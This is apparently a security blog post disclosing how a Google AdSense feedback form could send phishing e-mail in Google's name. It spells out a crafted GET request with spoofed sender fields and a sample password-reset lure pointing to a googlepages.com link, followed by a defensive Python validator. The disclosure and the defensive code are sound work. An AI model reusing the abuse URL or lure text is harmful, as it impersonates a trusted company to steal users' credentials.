Phishing With Google.

I really feel Google should know better than this. Check out this form residing on the Google domain[1]. It allows phishers to use the Google e-mail interface to phish Google customers in a very simple way. Let's say we set up a Google Pages account or some other domain and create a page that looks like the Adsense interface where customers can change their login credentials. We then use the Google e-mail interface to send an e-mail in Google's name, phish people into visiting this website, and collect the submitted credentials.

While this can be nasty, it doesn't stop there. I wonder what happens when Gmail's spam filter kicks in once someone starts spamming through this e-mail interface, and the filter starts blocking Google's own e-mail addresses because of the large volume of e-mail coming from their own domain? It's probably also possible to get someone's e-mail address blacklisted this way.

Moreover, the e-mail interface also accepts GET requests to submit the phishing e-mail:

http://services.google.com/feedback/adsensetour_email?
validate_form=yes&
FirstName=adsensecustomer&
Email=foobar%40gmail.com&
LastName=Sergey+Brin&
Company=security%40google.com&q_Answer=MESSAGE_HERE&
submit=Send+It

Message:

This is an important message to all our Adsense customers. Google needs to
verify your Adsense account, every year we require you to change your password in
order for your safety. You must change your password within 10 days or your account
will be suspended.

Follow this link to change your password:

http://googlepages.com/chgpass/
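The weaknesses above (GET accepted, free-form names and message delivered in the site's name, links to arbitrary hosts) are what a "tell a friend" handler has to refuse. The following is an added example, not Google's code: a validator and envelope builder for the same field names as the form in the post, with a hypothetical link-host allowlist and a placeholder sender domain.

```python
import re
from urllib.parse import urlparse

# Field names as they appear in the form URL quoted in the post.
ALLOWED_FIELDS = {"validate_form", "FirstName", "LastName", "Email",
                  "Company", "q_Answer", "submit"}
# Hypothetical allowlist (assumption): the only hosts a forwarded link may point to.
ALLOWED_LINK_HOSTS = {"www.google.com", "adsense.google.com"}
MAX_NAME, MAX_MESSAGE = 64, 500
URL_RE = re.compile(r"https?://[^\s<>]+", re.IGNORECASE)
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def validate_share_request(method, params):
    """Return (ok, reasons); each reason names one abuse pattern from the post."""
    reasons = []
    if method.upper() != "POST":  # the endpoint in the post also honoured GET
        reasons.append("must be POST")
    unknown = sorted(set(params) - ALLOWED_FIELDS)
    if unknown:
        reasons.append("unknown fields: " + ",".join(unknown))
    for field in ("FirstName", "LastName", "Company"):
        value = params.get(field, "")
        if re.search(r"[\r\n]", value):
            reasons.append(f"{field}: CR/LF not allowed (header injection)")
        if "@" in value:  # a name field must not double as a sender identity
            reasons.append(f"{field}: must not contain an e-mail address")
        if len(value) > MAX_NAME:
            reasons.append(f"{field}: too long")
    if not EMAIL_RE.match(params.get("Email", "")):
        reasons.append("Email: not a valid address")
    message = params.get("q_Answer", "")
    if len(message) > MAX_MESSAGE:
        reasons.append("q_Answer: too long")
    for url in URL_RE.findall(message):  # block links to hosts we do not vouch for
        host = urlparse(url).hostname
        if host not in ALLOWED_LINK_HOSTS:
            reasons.append(f"q_Answer: link to unapproved host {host}")
    return (not reasons, reasons)


def build_mail(params):
    """Fixed envelope: From/Reply-To are constants, user text sits in a labelled quote."""
    ok, reasons = validate_share_request("POST", params)
    if not ok:
        raise ValueError("; ".join(reasons))
    sender = f"{params['FirstName']} {params['LastName']}".strip()
    return {"From": "Adsense Tour <noreply@example.invalid>",  # placeholder domain
            "Reply-To": "noreply@example.invalid",
            "To": params["Email"],
            "Subject": "A friend shared the Adsense tour with you",
            "Body": f"{sender} shared this with you. Their note (not written by us):\n> "
                    + params["q_Answer"].replace("\n", "\n> ")}
```

Run against the parameters from the post's URL, the validator reports the GET method, the e-mail address placed in Company, and the link to googlepages.com as separate reasons.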

[1] http://services.google.com/feedback/adsensetour_email?hl=
source: OWASP News